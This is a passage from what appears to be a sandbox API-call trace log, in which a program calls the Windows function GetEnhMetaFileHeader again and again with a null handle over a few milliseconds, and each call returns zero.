0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.780] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.781] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.782] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0115.783] GetEnhMetaFileHeader (in: hemf=0x0, 